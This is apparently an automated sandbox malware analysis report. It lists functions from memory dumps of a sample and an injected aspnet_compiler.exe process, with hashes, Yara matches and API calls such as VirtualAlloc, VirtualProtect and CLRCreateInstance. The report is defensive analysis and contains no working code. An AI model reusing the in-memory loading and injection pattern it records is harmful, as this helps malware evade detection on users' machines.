Instruction ID: 8bd01171024725d38ac91bd7238dd974025e7fa4f97701b943aaa3e1e258235a
Opcode Fuzzy Hash: cc37f4b82142028761e9eca499d628bc9e34c32fdc4e1569abac706cc2e7d351
Instruction Fuzzy Hash: A6E02631B18B494EE77813BD688C772AAC5EB9D32DF10853AD00CC22C0E96C58818740

Function 00007FFD34A76E4E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b19210caf3ec271cd9311422a6b6198cf7ee1bdd5683d667107821a2637ae3
Instruction ID: e25338a5dcdfab9dc7dd63a9602c41815db98e2f7ec6bb2556fcfdd016a40046
Opcode Fuzzy Hash: 12b19210caf3ec271cd9311422a6b6198cf7ee1bdd5683d667107821a2637ae3
Instruction Fuzzy Hash: 53D01200F5C81E06999872B828B51BD91C2DBCA75479054B9E50EC328ADD5C5D422380

Function 00007FFD34A7BFB6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b83e5d77940079ef75eccae38baa5bd99814d05d6eb349a7bd6e9d5e8978f3d
Instruction ID: ad676888681b1f0a93acade6bea8ccaa45bf6a1ac2c8abf6ed0dfcc613c29030
Opcode Fuzzy Hash: 0b83e5d77940079ef75eccae38baa5bd99814d05d6eb349a7bd6e9d5e8978f3d
Instruction Fuzzy Hash: 1AE01232B0891D4F9B58AB9C78A22F9B3D1EF8E2287555176E10DC3182CD29AC254681

Function 00007FFD34A7F93A Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffee163ee49aace2f18581f7627d64882bd39c0d7647648f0b9c5d37d606601f
Instruction ID: 9b322cdaaf2aa2b30b46c9041417c01032b59c38cb25dc5214cf8f2edd56a3af
Opcode Fuzzy Hash: ffee163ee49aace2f18581f7627d64882bd39c0d7647648f0b9c5d37d606601f
Instruction Fuzzy Hash: 40F01774904A1A9FDB96DF28C899798B6F0FB18311F0000EA9808D6211CB348AC08F00

Function 00007FFD348AA766 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba50b30842e095d5a4d88e8304faf1dd9e610bceae41b2b06607c2a6bda92547
Instruction ID: 5c9e2f7c091f018d4bc7429e7efe9ab09babd6be07160bffe2c262960dbe8fea
Opcode Fuzzy Hash: ba50b30842e095d5a4d88e8304faf1dd9e610bceae41b2b06607c2a6bda92547
Instruction Fuzzy Hash: 43E0B634D0992C8ADBA8DB148C957EEB2B1FF55301F4091FA810EE2191DEB82A859F01

Function 00007FFD34A7EDDF Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9234b160a0f07e8e297de9d1ec992e44c647a508bacf771b3e4f9819a80c918a
Instruction ID: d57904cf821ebe04ba54b1cfd6e7c5bd1cb4e8afc3db5d5088b17090de362381
Opcode Fuzzy Hash: 9234b160a0f07e8e297de9d1ec992e44c647a508bacf771b3e4f9819a80c918a
Instruction Fuzzy Hash: 9FD0A7B250A1C18FF756D7E10476194BAC0FF02210B0841FED046DB592C41C28448B12

Non-executed Functions

Function 00007FFD34A704CB Relevance: 4.0, Strings: 3, Instructions: 283COMMON

Download Yara Rule

Strings

1_^, xrefs: 00007FFD34A7072A
>1_^, xrefs: 00007FFD34A70601
1_^, xrefs: 00007FFD34A706C9

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: 1_^$1_^$>1_^
API String ID: 0-551277107
Opcode ID: 73913aea9d0878d5e36093bd9c589b6dd42dedd30cd71639feb66e35ed6b91d5
Instruction ID: 63146b46e8d20e0163afe646b1b17f4a74c549105849ee27495a95d9c586f254
Opcode Fuzzy Hash: 73913aea9d0878d5e36093bd9c589b6dd42dedd30cd71639feb66e35ed6b91d5
Instruction Fuzzy Hash: F291962790C2926BE320BBFCE8B24DA7FA4EF0232C71D5176D588DA053ED7C74469684

Function 00007FFD34A704F8 Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

>1_^, xrefs: 00007FFD34A70601
1_^, xrefs: 00007FFD34A706C9

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: 1_^$>1_^
API String ID: 0-2142292170
Opcode ID: 4be60a8c67478f7f5a40d50b9271aa68e29bf4eed69f201b7bbbf90c2692a32e
Instruction ID: dd30752d02f8b0b214241d9ac58eee2cfab4771c655007991ea0bfdf7369691b
Opcode Fuzzy Hash: 4be60a8c67478f7f5a40d50b9271aa68e29bf4eed69f201b7bbbf90c2692a32e
Instruction Fuzzy Hash: B771852790C2927BE321BBFCE9B20D67FA4EF0232871D5176D588DA063EE7C75458684

Function 00007FFD34A804C0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

0_^, xrefs: 00007FFD34A80762

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: 0_^
API String ID: 0-1792672234
Opcode ID: 3e57f69cf4dae70656426be825d71c31bff2e2f311b33ba5b2c502c72ce82134
Instruction ID: 29616c99ef73838d58c9a463f894e1e0eaefd2a25b050b2658d3bc8e2ff9c841
Opcode Fuzzy Hash: 3e57f69cf4dae70656426be825d71c31bff2e2f311b33ba5b2c502c72ce82134
Instruction Fuzzy Hash: F3912C6298E3D22FE323437458B24D63F749E0322872F41E7D594CB893D95D265AE372

Function 00007FFD34A805D4 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

0_^, xrefs: 00007FFD34A80762

Memory Dump Source

Source File: 00000000.00000002.2655174620.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34a70000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: 0_^
API String ID: 0-1792672234
Opcode ID: c9e7577daa4f6ec96a8c3f7602d04326f7db030260959a1aab631c799cbc7046
Instruction ID: e66695e6ca14cc7417825c3c6cfe2c77c81ab72fdc63e989eea9b2ec7af31006
Opcode Fuzzy Hash: c9e7577daa4f6ec96a8c3f7602d04326f7db030260959a1aab631c799cbc7046
Instruction Fuzzy Hash: 7E512A5290E7C22EE763937858B51967FB0AF1322872F00EBC5D4CB493D95C784AE362

Function 00007FFD348A6FF2 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6804fb4065b7023b8938c4f805e93e683ee8919d1d5b42316d71227ea2652d0
Instruction ID: 7b69dbe1ac8233cf696e05dbebea181109f7f3f1148f19ce2d7ca99db57a62ca
Opcode Fuzzy Hash: c6804fb4065b7023b8938c4f805e93e683ee8919d1d5b42316d71227ea2652d0
Instruction Fuzzy Hash: 52617E07B0E6A616E622B7BCF8F61DA7BD4DE4333970C52F3C188CE043ED69644A9195

Function 00007FFD348A71FA Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b3c18e25d689d920193a7066c5227e74106e0aa646f8889e238a2d6fc0f1b4
Instruction ID: 42472fc7d77477c3046a3eef267ae32ef8458832b2dd7c03a05b01f61c16b4a0
Opcode Fuzzy Hash: c6b3c18e25d689d920193a7066c5227e74106e0aa646f8889e238a2d6fc0f1b4
Instruction Fuzzy Hash: AC518C17B0E6A616D722B3BCB8F21DA7BA0EF4333970C42F3D188CE043ED59644A9255

Function 00007FFD348A7563 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af67557aabeaeb738059911830cb722a66a59b2d003fe13f5a8d0bfafc581606
Instruction ID: 6d76975ca780df1a6b436e4e646e976defbc0625e5a703d352a0f3cfc149cf8e
Opcode Fuzzy Hash: af67557aabeaeb738059911830cb722a66a59b2d003fe13f5a8d0bfafc581606
Instruction Fuzzy Hash: 6F51BA07B0E6A616D622B3BCF8B61DA7B94DE4333970C13F7D288DE083EC59644B5295

Function 00007FFD348A85FA Relevance: 5.1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD348A85FA
M_^, xrefs: 00007FFD348A8622
M_^, xrefs: 00007FFD348A8672
M_^, xrefs: 00007FFD348A86C2

Memory Dump Source

Source File: 00000000.00000002.2653224808.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348a0000_1C24TBP_00000143.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^
API String ID: 0-1397233021
Opcode ID: c1d4a16e15d4f5d46382fc6474250b2962a98ef02b3cc77b979069f9f63b2908
Instruction ID: 85477e30622275dd102de2bc1cf49b06d84c94a3e5bb3f3d956d51236395cb9a
Opcode Fuzzy Hash: c1d4a16e15d4f5d46382fc6474250b2962a98ef02b3cc77b979069f9f63b2908
Instruction Fuzzy Hash: 0A21F373A0A6558BD356A76CDCBA1D977D0EF13339B4E0BF2C298C7253FD2868068191

Analysis Process: aspnet_compiler.exePID: 1816, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	57
Total number of Limit Nodes:	5

Executed Functions

Function 00007FFD3497CE8A Relevance: 2.4, Strings: 1, Instructions: 1143COMMON

Download Yara Rule

Strings

c6, xrefs: 00007FFD3497D8D8

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: c6
API String ID: 0-1700477281
Opcode ID: aa0845b1d92aa0f69b61722df5a4361870d53a1d211538b668db5bd5ba01a068
Instruction ID: 4a43465bd77bc9a48888e80b09117ca4463ff9c0f7c8426d836d151e4cb79d57
Opcode Fuzzy Hash: aa0845b1d92aa0f69b61722df5a4361870d53a1d211538b668db5bd5ba01a068
Instruction Fuzzy Hash: AE92A37190D3C64FE7268B2488A26E53FE0EF43314F0546FED5C9CB1A7DA2C554A87A2

Function 00007FFD34983708 Relevance: 2.1, Strings: 1, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00007FFD3498743E

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8a43111a3a67814f9958dcfe5ffffa302a1a3173eccc0894795ab33c6419b1c6
Instruction ID: e91bf620b80081d04388bcf91c813926fa743854a1c9bbb8eebb40c9f5f21a3b
Opcode Fuzzy Hash: 8a43111a3a67814f9958dcfe5ffffa302a1a3173eccc0894795ab33c6419b1c6
Instruction Fuzzy Hash: 4242C771B1CA094BEBA8DB6C98A63B9B7D1FB99314F1401BED04DD3296DE38AC418741

Function 00007FFD3498014F Relevance: 1.8, Instructions: 1789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14c781affb5fe38f7b6c21e62448c470ea3206737c0b4f77bd0e25c5752510e
Instruction ID: a486331be2ea9de2d6decbd49f6e353858780dcd088c93b232f9604f657d92ff
Opcode Fuzzy Hash: a14c781affb5fe38f7b6c21e62448c470ea3206737c0b4f77bd0e25c5752510e
Instruction Fuzzy Hash: E8E2C370A1C7858FD3B5CF18C491AA5B7E0FF8A304F15857EC58EC7696DA38A442CB92

Function 0000016985B2F39C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 0000016985B2F40F

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: f99225ec8f609d7665dc352c72d99600de6d9cf9b8605018d2e30787dfbdbdeb
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: 0FC1753061490D4BEBD9EA28DCD67E9B3DDFBA9300F14426DD44AC319DDB31E90AC691

Function 00007FFD34983748 Relevance: 1.0, Instructions: 996COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794e8c4c6a6d90a48a5c2828a4b14b2ef66559bd8c6cbf5db2d2a0ae4428ee77
Instruction ID: a63dc7df8365ec4431c04a29307e76c8d762641cdbe8ee23da3bc9060b4e1409
Opcode Fuzzy Hash: 794e8c4c6a6d90a48a5c2828a4b14b2ef66559bd8c6cbf5db2d2a0ae4428ee77
Instruction Fuzzy Hash: 31525931F0C6190FE7A8A62CACA22B973D1EB57314F1401BDD58EC3297ED2DAC479291

Function 00007FFD34999560 Relevance: .9, Instructions: 852
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a467d629070d49702987b217004d8bd02eb86e6ca2f6bc970d82b93c8a1bc3e7
Instruction ID: 777779782e41604b1fe4794b5c641a7e5800e203721459af40a8a98d36097561
Opcode Fuzzy Hash: a467d629070d49702987b217004d8bd02eb86e6ca2f6bc970d82b93c8a1bc3e7
Instruction Fuzzy Hash: 5442F831F1CA494FEBA8DA6C98956B977E1FF5A310F10417ED18EC3246DE38AC428791

Function 00007FFD34984DF9 Relevance: .9, Instructions: 851COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608af6ebf7cf830a269b232ace7dc87a2dbe8f4a704da149f636d87c13aae477
Instruction ID: 236516c033102fc2514a36f5725ee4fbe6e71893db6d504e4b6852adcf27862d
Opcode Fuzzy Hash: 608af6ebf7cf830a269b232ace7dc87a2dbe8f4a704da149f636d87c13aae477
Instruction Fuzzy Hash: FF523731F096498FEBE9DB2C88A56E877E1EF56320F0401BDD54DC71A6DE38684A8B50

Function 00007FFD3497D968 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3852afc098a341c6dc428790099e78cbc5f37e81031cac3d90421457a540d6c
Instruction ID: 4188b486c66c4ea015afe3b66634fa04d602d3cc2cddf7d3b06ffb7982e81199
Opcode Fuzzy Hash: b3852afc098a341c6dc428790099e78cbc5f37e81031cac3d90421457a540d6c
Instruction Fuzzy Hash: 0C52C77190D3C24FE37A8B2488A25E53FE0EF97310F0586BED989CB197DA3C55168762

Function 00007FFD3497D9C5 Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0010ff0e671a6d05d1398ff4293fdc52b3456a2bcf89392b6c4c1e0a8611ddbb
Instruction ID: 4be7dd2fa756e1cdfc33cfb5d34e87d34813b2388c9c810fc9936f77a23b6a7d
Opcode Fuzzy Hash: 0010ff0e671a6d05d1398ff4293fdc52b3456a2bcf89392b6c4c1e0a8611ddbb
Instruction Fuzzy Hash: 0222D77190D3864FE7798B148CA16EA3FE0EF97310F04867ED98DC7196DA3C581587A2

Function 00007FFD34989F45 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ccec9dd9f6fc12d18c8cff02542c1602606dd812bb135ae41c8782eedbe78d
Instruction ID: 1139f9ec8b35fc15a539e5c5ff515f33b3bf5307dcf55fda73eadd4c29b74e94
Opcode Fuzzy Hash: 77ccec9dd9f6fc12d18c8cff02542c1602606dd812bb135ae41c8782eedbe78d
Instruction Fuzzy Hash: 0902E730B1D64A9FD759DB7C94A67A9BBE1FF56304F1401BEC049CB2A7CE2AA801C750

Function 00007FFD34975972 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c45c896dea24acb9e807dd4ad9f36d8d8e4929c20f6e5c09bf6ec8df42e760e
Instruction ID: df1985e13a3aab43e42dd796326cf366bf19d5619235abe0d92d516a947a994d
Opcode Fuzzy Hash: 3c45c896dea24acb9e807dd4ad9f36d8d8e4929c20f6e5c09bf6ec8df42e760e
Instruction Fuzzy Hash: 5FE1C430608A4E8FEBE8DF28C8A57F97BD1FF55310F14826ED80DC7695DA78A8458781

Function 00007FFD3497D090 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5408f0cdf98c301c18abc782133e231ab431be9f38748bbdbb59994d75350d
Instruction ID: 8741515072a0707613a5d5ccffaef9892636d2532cc505aef329f628c572d0bf
Opcode Fuzzy Hash: 2e5408f0cdf98c301c18abc782133e231ab431be9f38748bbdbb59994d75350d
Instruction Fuzzy Hash: 12E1B37190D7C64FE33A8B1488916E93FE0EF87314F0446BED9CDCB196DA2C544A87A2

Function 00007FFD34983718 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd0e2951b1c29c19b18b9af0e9a089d6c796a269a373e893a114b2e4921e695
Instruction ID: 9d7511dd73139b192fb9ee71e57b0e01c907f5bebf0733dd0d89823650af7d7b
Opcode Fuzzy Hash: ebd0e2951b1c29c19b18b9af0e9a089d6c796a269a373e893a114b2e4921e695
Instruction Fuzzy Hash: 7CA10971B0C6490FE7A89B1C84A677A77D2EBD6300F10417ED54EC76A6DE3CAC429782

Function 00007FFD349865A1 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1586ed0918460e16e4b7b84d6154ad8c51b97615aa4f07a26e051169c13d5ef9
Instruction ID: ecf673366a694c1e101d9031ed5e841c58201ac8b79ebc1b4e563807c3681b28
Opcode Fuzzy Hash: 1586ed0918460e16e4b7b84d6154ad8c51b97615aa4f07a26e051169c13d5ef9
Instruction Fuzzy Hash: E7910971B0C6490FE7A89B1C84A237A77D1EBD6310F10417ED14EC76A6DE3DAC428792

Function 00007FFD34986577 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9803e2f77cf09dc8c6ef3f3d145267e4128b740cc2221a3c6a07e663b0184cd6
Instruction ID: 54fc814fd5f96f42cd7c25387ef13be6eebbf2954de65f61bddf13e7f32af821
Opcode Fuzzy Hash: 9803e2f77cf09dc8c6ef3f3d145267e4128b740cc2221a3c6a07e663b0184cd6
Instruction Fuzzy Hash: 2991F871B0C64D0BEBA89B1C846237A77D2EBD6310F10417ED54EC7696DE3CAC468782

Function 00007FFD349774A5 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474a22080c305623af3666806427d53c9f5ace425b27281367044e5ead328a93
Instruction ID: 16666f612178df670b4382ad0f01f2f071a87fa1229a511d3f57c7478b247cf0
Opcode Fuzzy Hash: 474a22080c305623af3666806427d53c9f5ace425b27281367044e5ead328a93
Instruction Fuzzy Hash: EC911722F0C6561FE761A7BCACF52EA7BE0DF42318F1840BAD149C7197ED2D68468351

Function 00007FFD34977E08 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6535918e356cd2683dca289dcab44dad864ccc7f808f8885e51a0ffef3526de8
Instruction ID: c505f6dee9aba38a569d26ca9811035572ce29aa208224dfe603b2c1940601bb
Opcode Fuzzy Hash: 6535918e356cd2683dca289dcab44dad864ccc7f808f8885e51a0ffef3526de8
Instruction Fuzzy Hash: 10811B31B1C6064FE76C9B5C88A5179B7D5FB9A314F15027EE18EC3396DE28EC438681

Function 00007FFD34977DA0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eae24dbc3659b1472a463e77c26e23f01b7f96fb9e42846c3765058f9922bcf
Instruction ID: 0d0c00357b297b0abb793fe6b7883e53d4a840bbe42d87fa721322f8401249aa
Opcode Fuzzy Hash: 8eae24dbc3659b1472a463e77c26e23f01b7f96fb9e42846c3765058f9922bcf
Instruction Fuzzy Hash: C8510772B0C6094BD7689E5C986627AB7D5FB89724F11027EE08FD3386DE34EC034682

Function 0000016985B2F128 Relevance: 6.3, APIs: 4, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 0000016985B2F174
SysAllocString.OLEAUT32 ref: 0000016985B2F290
SafeArrayCreate.OLEAUT32 ref: 0000016985B2F302
SafeArrayDestroy.OLEAUT32 ref: 0000016985B2F374

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ArrayCreateSafe$AllocDestroyInstanceString
String ID:
API String ID: 67500077-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: e8619f4d2038a5435bbe71dc9058b16d72c7d0b400127cf6d1f9b1c2ae2335f6
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 60817431218A088FDB68EF28D8897E6B7E8FF66301F10462DD49BC7159DB31E505CB92

Function 0000016985B2E304 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000016985B30BB4: LoadLibraryA.KERNEL32 ref: 0000016985B30C82

VirtualProtect.KERNEL32 ref: 0000016985B2E380
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,0000016985B2F5AE), ref: 0000016985B2E3A9
VirtualProtect.KERNEL32 ref: 0000016985B2E3EE
VirtualProtect.KERNEL32 ref: 0000016985B2E412

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
